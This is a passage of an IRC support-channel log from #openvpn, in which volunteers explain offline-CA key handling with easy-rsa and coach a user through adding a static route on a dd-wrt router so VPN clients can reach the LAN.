bring in the .csr 13:21 * krzee holds up djb's router 13:21 < pekster> krzee: Yes, of course :) 13:21 < Devastator> ok, I'll redo with minor changes for you to comment again 13:22 < pekster> If you're going to use an offline CA, you might as well not pollute things by dropping your unencrypted key on (traditionally hard to erase/secure later) flash media 13:22 < pekster> That's just shooting yourself in the foot if you ever loose that USB stick (and the theif wants to attack you. Temper my paranoia levels to suit your needs, of course) 13:23 < Devastator> your paranoia makes sense imho 13:23 < pekster> General process works like this: set up CA on an offline environment (you have this now.) Keep the physical storage secure, and never plug it into an online system. Also use a strong passphrase for the CA key 13:24 <@dazo> pekster: you would probably cat the file on the terminal ... and type it into the other (destination) terminal? 13:24 <@dazo> or would that make it risky in regards to telepathy? 13:24 <@dazo> ;-) 13:24 < pekster> Why would I need to copy anything over by terminal? :P 13:25 * pekster generates keys on target systems using them, and certs/csr's are not private 13:25 < pekster> You can send your csr/crt by email, walkie-talkie, ham radio, or take out an advert in the Super Bowl for all I care :) 13:25 * dazo is just trying to make fun of pekster :-P 13:25 <@dazo> yeah, agreed :) 13:26 < pekster> I once exchanged GPG fingerprints with a buddy over ham raadio :) 13:26 <@dazo> geek! 13:26 < Devastator> hahaha 13:26 < pekster> It was more convenient at the time than some silly challenge/response thing in email 13:27 <@dazo> uhm ... phone? ;-) 13:28 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:29 < pekster> Ironically, ham radio was probably "faster" (transmission wise) since it goes the speed of light, not subject to brief delays in the telco's system ;) 13:29 < pekster> Anyway... 13:29 <@dazo> :) 13:30 * dazo wonders if WinstonSmith is a George Orwell fan ..... 13:31 < pekster> Devastator: It's actually fairily easy to generate keys on your server/clients: each one just has their own easy-rsa setup. You make sure vars has matching values. server/clients don't need to do any build-ca or build-dh stuff: just build-req (for the server: that'll be *unencrypted* since it can't type a pass on startup) and build-key-pass (for clients where you normally do want keys encrypted for protection) 13:31 <@dazo> pekster: if you read the scrollback ;-) 13:31 < pekster> dazo: Yea. That has some stuff about .key files going onto USB 13:32 < pekster> key generation on the target avoids that 13:35 <@dazo> pekster: yeah, I know ... but we discussed the build-req stuff :) 13:36 <@dazo> [19:35] the CSR contains a the public key of the client + certificate subject info (Common Name, etc, etc) ... and the CA will the, with ./sign-req, display this info and ask you: Is this information correct? ... and if yes, it signs the CSR with it's CA key 13:37 <@dazo> sorry ... wrong paste 13:37 <@dazo> [19:33] The client can do a ./build-req ... which makes only the client.key + client.csr .... send the client.csr to CA and get a client.crt back 13:38 < pekster> Ah, k. nvm then. So long as "vars" match and the $KEY_DIR is created (clean-all once on each host does that) yea, that'll do it 13:45 <@dazo> pekster: why does ./vars need to match? 13:45 < pekster> openssl.cnf as used by easy-rsa is configured to reject a mis-match of some X509 fields 13:45 <@ecrist> yeah 13:46 <@ecrist> it's irritating, imho 13:46 < pekster> One can patch openssl.cnf of course, but then you probably aren't using easy-rsa if you have that level of skill :P 13:46 <@ecrist> I wish I knew who could fix that. 13:46 < pekster> I can 13:46 <@dazo> hmmm ... interesting 13:46 <@ecrist> pekster: I was being funny 13:46 < pekster> Maybe I'll even give you an 'svn diff' patch this time ;) 13:46 <@ecrist> that'd be sweet 13:46 < WDKevin> ive done some reading up on the routing as i was instructed to do earlier, and while it seems a little confusing, i think i get the basics of it. 13:46 <@ecrist> or, create a github account and submit a pull request 13:47 < WDKevin> now if i could just figure out how to get the vpn client to see the rest of the network based on what i read 13:48 <@dazo> WDKevin: look into tcpdump ... 'tcpdump -ni tun0' ... and on another terminal 'tcpdump -ni eth0' .... (change tun0/eth0 to the devices you expect) 13:48 <@dazo> and then from one place, start a ping to a host you want to reach .... then you can see with tcpdump where the ping and pongs goes 13:48 <@dazo> and then you'll probably get a hint where to start looking 13:49 < WDKevin> ok, just did that 13:49 <@dazo> further 13:49 < WDKevin> im at work, vpn'd in and ssh'd into the openvpn server 13:49 < pekster> ecrist: Another option is to just do away with all the silly options in the cert to begin with. Unless keeping company/city/state/etc was really wanted. I design all my VPN certs with nothing but a CN 13:49 < WDKevin> when i ping a different server on the network, i can see it in the tcpdump, it going to that ip 13:50 <@ecrist> pekster: if you want to get involved with easy-rsa, we should talk 13:50 <@ecrist> there's a lot of "silly" in there I want to do away with. 13:50 < WDKevin> dazo, should i 2 entries for each ping or just one? 13:51 < WDKevin> just a forward from the vpn ip to the destination ip im pining? 13:51 <@dazo> but do you get more than just ICMP ECHO request ... you should see both ICMP echo request and then following an ICMP echo reply message 13:51 < WDKevin> nevermind that 13:51 <@dazo> 20:51:06.017622 IP 10.35.7.2 > 172.16.33.20: ICMP echo request, id 31541, seq 1, length 64 13:51 <@dazo> 20:51:06.082056 IP 172.16.33.20 > 10.35.7.2: ICMP echo reply, id 31541, seq 1, length 64 13:51 < WDKevin> yes, when i ping the vpn server, i get that 13:51 < WDKevin> a request and a reply 13:51 < WDKevin> when i ping another server on the network i only see the request, no reply 13:52 <@dazo> okay ... that means that your VPN server is the first place to look 13:52 <@dazo> you do the tcpdump on the VPN server? 13:52 < WDKevin> yup 13:52 <@krzee> i will guess: 13:52 <@krzee> !route_outside_ovpn 13:52 <@vpnHelper> "route_outside_ovpn" is "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png 13:52 <@dazo> okay ... then there are two things to check .... a) ip_forwarding enabled? b) firewalling? 13:52 < WDKevin> krzee, that is also what someone else suggested this morning 13:53 <@krzee> ip forwarding is enabled because he got to the servers eth0 13:53 < WDKevin> thats what i was told to read up on routing 13:53 < WDKevin> yes, ip forwarding is enabled 13:53 < WDKevin> and yo uare correct, the vpn server is not the gateway for the LAN 13:53 <@krzee> im generally pretty good at diagnosing these ;] 13:53 <@dazo> WDKevin: then you need to add a route on either your default gateway ... or the server you try to reach 13:54 <@krzee> ^ yep 13:54 < WDKevin> i think the guys had figured it out this morning too, but i was instructed to do sdome learning before i could get more help 13:54 <@dazo> which points your VPN IP network to your OpenVPN server 13:54 < pekster> ecrist: Sure. I'm only half-here now (listening to nasa's press release on DA14) but I can PM you or join the dev channel as appropriate. Exchange goals or a wishlist or something 13:54 < WDKevin> i would like to do it on the gateway so i can reach all my servers on the lan 13:54 <@dazo> WDKevin++ 13:54 <@krzee> if you want learning: 13:54 <@krzee> !route 13:54 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 13:54 < WDKevin> the gateway is my router, which is running dd-wrt 13:54 <@krzee> the section "routes behind openvpn" talks about this 13:54 <@krzee> errr "routes outside openvpn" 13:55 <@krzee> you have 1 easy route to add to that router 13:56 < WDKevin> looking at my dd-wrt web interface, im in the setup -> advanced routing -> static routing 13:56 <@dazo> that's the right place! 13:56 < WDKevin> would i add a route here with the destination lan net set to my vpn gateway, the subnet is 255.255.255.0 and the gateway is my lan's gateway (192.168.1.1)? 13:57 <@dazo> no 13:57 <@krzee> WDKevin, thought you wanted to learn 13:57 < WDKevin> doh 13:57 -!- joshie_ [~josh@75-150-76-129-NewEngland.hfc.comcastbusiness.net] has joined #openvpn 13:57 < WDKevin> krzee, im reading the article you linked 13:57 <@krzee> i gave you links to a diagram and explanation 13:57 <@krzee> :D 13:57 -!- RealRancor [~Rancor@mafiaforum.de] has joined #openvpn 13:57 * WDKevin slaps himself 13:57 <@dazo> you need to route the VPN network via the VPN server ... 13:58 -!- joshie [~josh@joshie.net] has quit [Ping timeout: 256 seconds] 13:58 <@krzee> http://www.secure-computing.net/wiki/index.php/Graph might be easy to understand (i hope it is) 13:58 <@vpnHelper> Title: Graph - Secure Computing Wiki (at www.secure-computing.net) 13:58 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 13:58 < WDKevin> krzee, looking that over again 14:01 < WDKevin> i think im getting confused because these diagrams are using 10. ip's for everything 14:02 < WDKevin> and my LAN is all on 192. 14:02 < WDKevin> just making it harder for me to get it all straight 14:02 <@dazo> WDKevin: right now, you don't need to care about LAN 14:02 < WDKevin> ok 14:02 <@dazo> WDKevin: what you need to care about ... is that you dd-wrt router gets packets destined towards your VPN 14:02 <@dazo> and you need to tell dd-wrt to route those packets via your OpenVPN server 14:02 < WDKevin> alright 14:03 < WDKevin> so can we agree the subnet is at least 255.255.255.0? 14:03 <@krzee> only lan ip involved is the vpn server's lan ip 14:03 <@dazo> WDKevin: is that the subnet of your VPN? 14:03 < WDKevin> it is 14:03 <@dazo> then that is the correct subnet 14:03 <@krzee> WDKevin, if your --server statement uses 255.255.255.0 14:03 < WDKevin> it does 14:03 < WDKevin> its server 10.8.0.0 255.255.255.0 14:03 <@krzee> thats the subnet you're adding a route to 14:03 <@krzee> and the gateway is the vpn server's lan ip 14:03 <@dazo> so called, destination net 14:04 * dazo is not giving the obvious and quick answer deliberately ... just so you'll understand it (and hopefully) remember it better 14:04 < WDKevin> i know this 14:04 < WDKevin> i prefer it 14:05 < WDKevin> and i certainly appreciate it! 14:05 <@dazo> :) 14:05 <@dazo> WDKevin++ for that attitude! 14:05 < WDKevin> so the gateway would be 10.8.0.0 14:05 <@dazo> no 14:05 < WDKevin> gah 14:05 <@krzee> did the "routes outside openvpn" section of !route help? 14:06 < WDKevin> krzee, i think it half helped, and half confused me more 14:06 < WDKevin> lol 14:06 <@dazo> WDKevin: did you understand what the gateway needs to be now? 14:06 < WDKevin> http://www.secure-computing.net/wiki/index.php/Graph 14:06 <@vpnHelper> Title: Graph - Secure Computing Wiki (at www.secure-computing.net) 14:06 <@dazo> the gateway is the box on your network who knows how to forward a subnet 14:06 < WDKevin> when i look at that graph, the gateway looks like my router 14:06 <@dazo> a specific subnet 14:06 <@krzee> WDKevin, you'll notice i didnt use common subnets, because you shouldnt use common subnets when routing lans over openvpn 14:07 <@krzee> the gateway in my graph is .10 on its lan 14:07 <@dazo> WDKevin: in the graph image .... replace 10.10.2 .... with 192.168.1 for example (or whatever your lan has) 14:07 < WDKevin> my lan is 192.168.1.1 as the gateway 14:07 <@dazo> and your VPN server? 14:07 < WDKevin> 10.8.0.0 14:07 <@krzee> you are sharing too common of a subnet over your vpn 14:07 <@dazo> WDKevin: your VPN server have two IP addresses 14:08 <@krzee> you may have problems when a client connects from 192.168.1.x (very very common) 14:08 <@dazo> one for the VPN ... and one for the eth0 14:08 < WDKevin> ah, ok 14:08 < WDKevin> tun0 is 10.8.0.1 14:08 < WDKevin> eth0 is 192.168.1.101 14:08 <@dazo> WDKevin: and 10.8.0.0 is the VPN subnet address 14:08 <@dazo> correct! 14:09 <@dazo> so now ... lets try to build up a route command ... shall we? All the information is here ... three variables 14:09 < WDKevin> lets do it 14:09 < WDKevin> the 3 fields i have in dd-wrt are destination lan net 14:09 <@dazo> subnet address (10.8.0.0) ... subnet mask (255.255.255.0) and your VPN server's eth0 addresss 14:09 < WDKevin> ok 14:09 < WDKevin> subnet is obvious 14:09 <@krzee> WDKevin, is 192.168.1.101 from dhcp? 14:09 < WDKevin> no 14:10 <@krzee> good 14:10 < WDKevin> static ips everywhere 14:10 < WDKevin> i promise im not as dumb as i look right now 14:10 < WDKevin> which admittedly is very dumb 14:10 <@dazo> you have the correct answer most likely right under your nose :) 14:10 <@krzee> well its likely in the dhcp pool still, but ill leave that for when you have problems with it lol 14:10 <@dazo> hehe 14:11 -!- RealRancor [~Rancor@mafiaforum.de] has quit [Ping timeout: 256 seconds] 14:11 <@dazo> krzee: don't distract is train of thoughts now ;-) 14:11 <@dazo> s/is/his/ 14:11 < WDKevin> krzee, ive limited the pool down to 200+ 14:11 <@dazo> WDKevin: so your routing parameters ... have you figured them out by now? 14:12 < WDKevin> the gateway is 10.8.0.1? 14:12 <@dazo> no 14:12 < WDKevin> then its the eth0 ip? 14:12 <@dazo> you want to tell the dd-wrt router to route your VPN subnet via your VPN server (which got the IP 192.168.1.101) 14:13 < WDKevin> so the gateway is 192.168.1.101 14:13 <@dazo> correct! 14:13 < WDKevin> now before i try to guess the destination net lan, what does that even mean? 14:13 < WDKevin> that label sounds wonky 14:14 < WDKevin> or is that where the 10.8.0.1 goes? 14:14 <@dazo> it is very obvious if you just think about it .... the dd-wrt gets a packet destined for exampl 10.8.0.3 .... now where should it route it? 14:14 <@dazo> it looks into the routing table 14:15 < WDKevin> so it is the tun0 ip? 14:15 < WDKevin> or no wait 14:15 < WDKevin> no it has to be 14:15 < WDKevin> right? 14:15 <@dazo> it finds which subnet 10.8.0.3 matches into ... the subnet mask 255.255.255.0 tells it that the destination subnet 10.8.0.0 have the valid range of 10.8.0.0->10.8.0.255 .... so 10.8.0.3 matches here 14:16 <@dazo> and it looks at the gateway field and finds 192.168.1.101 .... and sends the packet to that box 14:16 <@dazo> WDKevin: 10.8.0.1 on the VPN server is for the VPN clients to have a gateway 14:16 < WDKevin> ah, ok 14:16 < WDKevin> hmmm 14:17 < WDKevin> i dont even want to guess anymore for fear of just sounding dumber and dumber :( 14:17 -!- joshie_ is now known as joshie 14:17 <@dazo> WDKevin: if you look at your VPN clients routing table ... you probably find a route saying destination: 10.8.0.0 subnet: 255.255.255.0 gateway: 10.8.0.1 14:17 <@dazo> sorry! 14:17 <@dazo> wrong! 14:17 <@dazo> WDKevin: if you look at your VPN clients routing table ... you probably find a route saying destination: 192.168.1.0 subnet: 255.255.255.0 gateway: 10.8.0.1 14:18 < WDKevin> so thats my desitnation? 14:18 < WDKevin> 192.168.1.0? 14:18 <@dazo> that means that your VPN client knows that when it tries to access a server inside your 192.168.1.{0-255} subnet ... it will send that traffic via the gateway: 10.8.0.1 14:18 < WDKevin> no 14:18 <@dazo> yes, 192.168.1.0 on your client is the destination 14:18 <@dazo> field 14:18 < WDKevin> ok 14:19 < WDKevin> it kinda made sense once you epxlained it 14:19 < WDKevin> ok 14:19 < WDKevin> so the rule says 14:19 < WDKevin> destination 192.168.1.10 subnet 255.255.255.0 gateway 192.168.1.101 14:19 < WDKevin> sorry 14:19 <@dazo> almost 14:19 < WDKevin> destination is 192.168.1.0 14:19 < WDKevin> typo 14:20 <@dazo> gateway is also wrong 14:20 < WDKevin> i thought gateway was my eth0 ip on the openvpn box? 14:20 <@dazo> because your VPN client doesn't know anything about the 192.168.1.0 subnet 14:20 <@dazo> your client needs to send that traffic via your VPN server, which from your VPN clients point of view is 10.8.0.1 14:20 < WDKevin> so the gateway is 192.168.1.101 14:20 < WDKevin> correct! 14:20 <@dazo> WDKevin: on the dd-wrt box, that is correct 14:21 <@dazo> that's a different view 14:21 < WDKevin> thats where im setting this 14:21 < WDKevin> im still on dd-wrt advanced routing screen trying to add this rule 14:21 <@dazo> ahh! 14:21 <@dazo> sorry, then I confused you! 14:21 < WDKevin> haha yea 14:21 < WDKevin> i wanted to understand that rule before i added it 14:21 <@dazo> on the dd-wrt ... you need destination 10.8.0.0 subnet 255.255.255.0 gateway 192.168.1.101 14:21 < WDKevin> gah! 14:21 < WDKevin> ok 14:22 <@dazo> that tells dd-wrt to route all packets going to your VPN via your VPN server, which has the local IP address 192.168.1.101 14:22 < WDKevin> do i need to do anything with the metric field? 14:22 <@dazo> nope 14:22 < WDKevin> that rule makes so much more sense now 14:22 <@dazo> :) 14:23 < WDKevin> ok 14:23 < WDKevin> now let me disco/reconnect to the vpn and try to ping that box 14:23 <@dazo> you don't need to reconnect 14:23 <@dazo> it should just work now :) 14:23 < WDKevin> holy jesus 14:23 < WDKevin> it does 14:23 <@dazo> ;-) 14:23 < WDKevin> im saving this entire convo 14:23 < WDKevin> i need to reread it a few times and really understand whats going on 14:24 < WDKevin> i cant thank you enouhg for making me go through the process this way. its the only way i can learn it and i truly appreciate your patience dazo 14:24 <@dazo> WDKevin: okay .... on your VPN client ... pastebin your routing table .... and I'll ask you a few question related to that table 14:24 <@dazo> WDKevin: it's easy to help people who wants to learn things! :) 14:25 < WDKevin> my vpn client is my work machine 14:25 < WDKevin> im at work right now 14:25 <@dazo> yeah, that's very fine 14:25 <@dazo> those questions will hopefully help you to understand the routing a bit more 14:25 < WDKevin> ok 14:25 < WDKevin> how can i get my routing table from a win7 box? 14:28 <@dazo> route print 14:28 <@dazo> from a shell 14:28 <@dazo> (cmd.exe) 14:31 < WDKevin> i can see my vpn ip in there too 14:31 <@dazo> yeah .... 14:36 -!- Devastator- [~devas@186.214.111.241] has joined #openvpn 14:38 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 255 seconds] 14:39 < EugeneKay> Sweeeet. Just got my openvpn shirt 14:40 <@plaisthos> EugeneKay: :) 14:40 < EugeneKay> Smells funny though 15:09 -!- JyZyXEL [~foo@a88-112-73-201.elisa-laajakaista.fi] has quit [Ping timeout: 255 seconds] 15:13 -!- JyZyXEL [~foo@a88-112-73-201.elisa-laajakaista.fi] has joined #openvpn 15:14 -!- dazo is now known as dazo_afk 15:32 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 255 seconds] 15:42 -!- nze [~user@unaffiliated/nze] has quit [Ping timeout: 255 seconds] 15:49 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 15:55 -!- vmachine1 [~PC@78-105-138-183.zone3.bethere.co.uk] has joined #openvpn 15:55 -!- vmachine1 [~PC@78-105-138-183.zone3.bethere.co.uk] has left #openvpn [] 16:02 -!- nickanderson is now known as nickanderson_afk 16:04 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.] 16:27 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 16:28 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 16:37 < kisom> EugeneKay: Smells like VPN ;) 16:39 < EugeneKay> I was thinking moth balls 16:41 -!- gry [~gry@freenode/staff/gry] has joined #openvpn 16:42 -!- gry [~gry@freenode/staff/gry] has left #openvpn [] 16:44 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 16:44 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 16:48 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 246 seconds] 17:09 -!- scampbell [~scampbell@mail.scampbell.net] has quit [Remote host closed the connection] 17:27 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 17:27 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 17:27 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 17:27 -!- mode/#openvpn [+o krzee] by ChanServ 18:02 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 246 seconds] 18:03 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn 18:07 < lickalott> dazo_afk where did you get this info from "it exists a database over all ssh/https keys used in all dd-wrt distributions" 18:08 < lickalott> i was told " the ssh key generation is not set with constants. /dev/urandom is used." 18:08 < lickalott> just want to verify sources 18:09 < pekster> Don't generate ssh keys on embedded hardware like routers. Your entropy will suck leading to very weak key generation 18:12 < pekster> Further reading: http://eprint.iacr.org/2006/086.pdf or a talk from this year's 29C3 available here, at talk ID 5275: http://mirror.fem-net.de/CCC/29C3/mp4-h264-HQ/ 18:12 <@vpnHelper> Title: Index of /CCC/29C3/mp4-h264-HQ (at mirror.fem-net.de) 18:12 < pekster> And that applies to any crypto keys (openvpn X509, ssh keypairs, keys for your webserver, etc, etc) 18:18 < lickalott> currently I have openvpn-as running on an ubuntu server. I haven't done the easy-rsa stuff yet to create my own CA (i seem to be missing things that the tut's callout) but do you think it's a better idea to leave it on there? I can access my network fine, i just figured having it on a router would make more sense. 18:20 < pekster> Nothing wrong with running openvpn on embedded hardware (openwrt, dd-wrt, or similar) but don't actually generate your private keys on that system 18:21 < pekster> Generate them on a system with proper entropy sources, preferably after it's been running for a little bit, and then trasnfer the keys over 18:22 -!- mattwj2002 [~matt@wikisource/pdpc.active.mattwj2002] has joined #openvpn 18:22 < pekster> Optionally, you can run openvpn on the ubuntu box too and just port-forwrad through any NAT you have on the router 18:22 -!- mattwj2002 [~matt@wikisource/pdpc.active.mattwj2002] has left #openvpn [] 18:22 < pekster> (I suspect openvpn and openvpn-as can coexist, but I've never touched the as product, so don't take my word on it) 18:24 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 18:39 -!- mattbillenstein [~mattbille@173.247.206.178] has joined #openvpn 18:50 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 246 seconds] 18:54 -!- AsadH is now known as zz_AsadH 18:55 < mattbillenstein> hi all 18:56 -!- brute11k1 [~brute11k@89.249.235.89] has joined #openvpn 18:56 < mattbillenstein> I recently had to switch out my openvpn server 18:56 < mattbillenstein> and I didn't transfer some of the client keys 18:56 < mattbillenstein> but those clients are still able to connect 18:56 < mattbillenstein> which is sorta alarming 18:56 -!- brute11k [~brute11k@89.249.235.89] has quit [Ping timeout: 248 seconds] 18:57 < mattbillenstein> how would that be possible? 18:57 < pekster> Because that's how PKI works 18:57 < pekster> The server uses the CA root certificate to verify that the cert presented over the wire by a connecting client is valid 18:58 < pekster> !pki 18:58 <@vpnHelper> "pki" is (#1) http://openvpn.net/index.php/open-source/documentation/howto.html#pki for how to make your PKI stuff (ca, and certs) or (#2) Heres a basic rundown of how it works... The server, client, and ca certs are all signed by the same ca.key. The server and client use the ca.crt to check that eachother were signed by the right ca.key. Optionally, the client also checks that the server cert was 18:58 <@vpnHelper> signed specially as a server (see !servercert) 19:03 < mattbillenstein> I see, didn't really understand that's how it worked 19:04 < pekster> If you're missing critical parts of your PKI, that may prevent you from signing certs for new clients, or (easily) revoking existing ones 19:06 < pekster> Specifically, you'll be completely hosed if you didn't back up your CA private key and have no other backups (that's the private part of the root keypair that signs everything else) 19:06 < mattbillenstein> yup, I keep a backup of that on a secondary server 19:06 < mattbillenstein> but when the primary went down (disk failure) - I hadn't synced over the clietn keys 19:06 < pekster> Outside of that, most of the PKI is accounting stuff. the index.txt file is a "database" of sorts, and the public keys of everything that's been signed can be referred to later to revoke ea client 19:06 < mattbillenstein> so I was surprised when they could connect anyway 19:07 < pekster> Do you still have the client certs at least? It's somewhat non-trivial to revoke a client certificate without being able to refer to the actual issued cert 19:08 < mattbillenstein> I was able to recover them from the disk actually, so I do have them 19:08 < mattbillenstein> I need a more automated backup here to prevent this sorta thing in the future 19:08 < pekster> Yea, I was just going to suggest you treat your PKI as a critical part of your backup infrastructure 19:09 < pekster> You can re-do your PKI, but then every client and your server(s) need new keypairs and a new ca.crt 19:09 < pekster> I've done that in the past for various reasons, and it's Not Fun (TM) 19:10 < mattbillenstein> cool, thanks for the advice 19:26 -!- Devastator- [~devas@186.214.111.241] has quit [Changing host] 19:26 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 19:26 -!- Devastator- is now known as Devastator 19:28 -!- raidz is now known as raidz_away 19:33 -!- mattbillenstein [~mattbille@173.247.206.178] has left #openvpn [] 19:37 -!- brute11k1 [~brute11k@89.249.235.89] has quit [Read error: Operation timed out] 19:37 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 19:51 < Devastator> pekster does this look safer than my last one? http://codepad.org/kwzRR2s5 19:51 <@vpnHelper> Title: Plain Text code - 23 lines - codepad (at codepad.org) 19:52 < Devastator> I hope this is the last one heheh 19:52 < pekster> Sort of. I don't let my keys touch USB devices that go into live systems 19:54 < pekster> Let's say I buy a new laptop and want to geneate a keypair for my existing home VPN. I'd generate a keypair directly on the laptop with its own completely separate process (not at all related to my VPN PKI on my CA system) 19:54 -!- mattwj2002 [~matt@wikisource/pdpc.active.mattwj2002] has joined #openvpn 19:54 < mattwj2002> hi all 19:54 < mattwj2002> sol? 19:54 < mattwj2002> :P 19:55 < pekster> I take one of my everyday USB sticks, put the CSR from that laptop on it, and copy it to the offline CA system. It signs it, then I put the cert back on the non-critical USB stick for transport back 19:55 < mattwj2002> I am a native English speaker 19:55 < pekster> See how the private keys are never (not even for an instant) on a machine bsides the one that generated it? 19:56 < mattwj2002> so openvpn? 19:56 < mattwj2002> how good is it? 19:57 < pekster> (except many of my VPN CAs are run from an online, semi-secure, but networked, host. Same principle really, but I use ssh/scp as a transport, not USB sticks there) 19:57 < Devastator> pekster isn't this what I did? I guess your offline CA system isn't a pendrive that you use on a live distro.. 19:57 < pekster> For 2 of my more "critical" PKI environments it is 19:57 < pekster> And one of my former client's was 19:58 -!- mattwj2002 [~matt@wikisource/pdpc.active.mattwj2002] has left #openvpn [] 19:58 < pekster> Step #4 in your list exposes the entire PKI to the server. That's unnecessary 19:59 < pekster> Let's say your server is compromised (for whatever reason.) Now that rouge process/user/whatever had access to copy the entire contents of the drive somewhere and begin brute-forcing it. Likely? Maybe not, but it doesn't make sense to use an offline CA if you don't actually keep it offline 19:59 < pekster> If that's not a security risk for you (it's not for many use-cases) then don't bother keeping it offline. Or just do it all on the server anyway and run it out of the USB stick to begin with 20:00 < pekster> (ie: limit the exposure for a possible attack to times when the removable media is in the system physically) 20:00 < Devastator> I guess it's not clear from the pastebin, but I separated computer #1 (server) and computer #2 (offline, live distro, used to sign certs) 20:00 < pekster> Oh, sorry, step #6 20:01 < pekster> The PKI, including the private key, is now connected to your online server 20:01 < pekster> It's no longer completely offline at that point 20:01 < Devastator> indeed 20:01 < pekster> There's no reason you need to do that 20:02 < Devastator> well, easy to fix at least, I copy ca.crt from the offline to a non-critical usb stick, then paste to the server, then build-key-server, build-dh 20:02 < Devastator> and keep ca.key totally offline 20:03 < pekster> Better. Best is to generate key pairs on the server/client itself 20:03 < Devastator> I mean, build-key-server and build-dh will be typed on the server itself 20:03 < pekster> build-req is required 20:04 < Devastator> right 20:04 < pekster> build-key-server is for when you do the key generation *and* signing on the same host (not possible when your PKI is offline) 20:04 < pekster> build-key-server basically does build-req and sign-req --server "at once" 20:04 < pekster> (verses separation operations on different systems) 20:05 < Devastator> pekster you said something about server key pairs aren't passphrased or something, can't I use build-req-pass for server as well? 20:06 < pekster> Only if you want to supply the passphrase to your key every time you launch the server process 20:06 < pekster> If you start openvpn on boot, that doesn't work 20:06 < Devastator> indeed 20:06 < pekster> (it also likely won't work unless you use the management interface if you plan to call it out of init anyway) 20:06 < Devastator> I guess it's ok to build-req it then 20:07 < pekster> So no, for servers (openpvn, apache's httpd, etc) traditioanlly the key is unencrypted on disk. Sometimes it's stored on an encrypted disk volumme, but then someone still needs to decrypt it afer a reboot 20:07 < pekster> Some people encrypt the key and store the decryption in a text file, but that's sort of silly IMO 20:09 < pekster> Also, no need to "secure" the transport medium. You're free to delete the csr and crt files when you're done, but they aren't private. You could paste them all in a pastebin and it wouldn't hurt your cryptographic security 20:10 < pekster> (and your certs are sent in plaintext across the wire every time you connect to the VPN. Any attacker on the wire could recover the entire cert file this way) 20:15 <@krzee> wow that conversation is still going on? 20:15 <@krzee> <-- amazed! 20:16 <@krzee> its like watching a car burn rubber 20:17 <@krzee> then again, im hella blazed, bbl :D 20:19 < Devastator> krzee what can I do if I'm slow learner? 20:19 < Devastator> :( 20:19 <@krzee> you're good, im just mean dont worry about me ;] 20:20 < Devastator> I agree with you, I wish I was more.. careless 20:25 * Devastator is afraid to paste his last pastebin.. don't wanna push some buttons 20:33 -!- sauce [sauce@unaffiliated/sauce] has quit [Ping timeout: 240 seconds] 20:50 -!- mattwj2002 [~Matt@wikisource/pdpc.active.mattwj2002] has joined #openvpn 20:50 -!- mattwj2002 [~Matt@wikisource/pdpc.active.mattwj2002] has left #openvpn [] 21:14 -!- Netsplit *.net <-> *.split quits: js_, hive-mind, Devastator, folivora, defswork, piele, jave, fatpony, nameless`, dvl, (+155 more, use /NETSPLIT to show all of them) 21:52 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Remote host closed the connection] 22:27 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 22:27 -!- Aketzu [akolehma@kelvin.aketzu.net] has joined #openvpn 22:27 -!- andi [~andi@unaffiliated/fr00d] has joined #openvpn 22:27 -!- Shadowized [~Shadowize@st0p.trying.to.trac3.me] has joined #openvpn 22:27 -!- NChief_ [tomme@unaffiliated/nchief] has joined #openvpn 22:27 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 22:27 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn 22:27 -!- pekster [~rewt@cl-466.chi-03.us.sixxs.net] has joined #openvpn 22:27 -!- havoc [~havoc@neptune.chaillet.net] has joined #openvpn 22:27 -!- mete [~mete@mete.shell.la] has joined #openvpn 22:27 -!- midgaze [~mreid@155.229.21.75] has joined #openvpn 22:27 -!- WDKevin [~WDKevin@173-163-136-177-centralpennsylvania.hfc.comcastbusiness.net] has joined #openvpn 22:27 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 22:27 -!- y4h0 [~yavor@78.128.23.17] has joined #openvpn 22:27 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 22:27 -!- `nand` [~nand@static.102.126.46.78.clients.your-server.de] has joined #openvpn 22:27 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has joined #openvpn 22:27 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 22:27 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 22:27 -!- william_ [~x@lotus.redl8.com] has joined #openvpn 22:27 -!- rob0 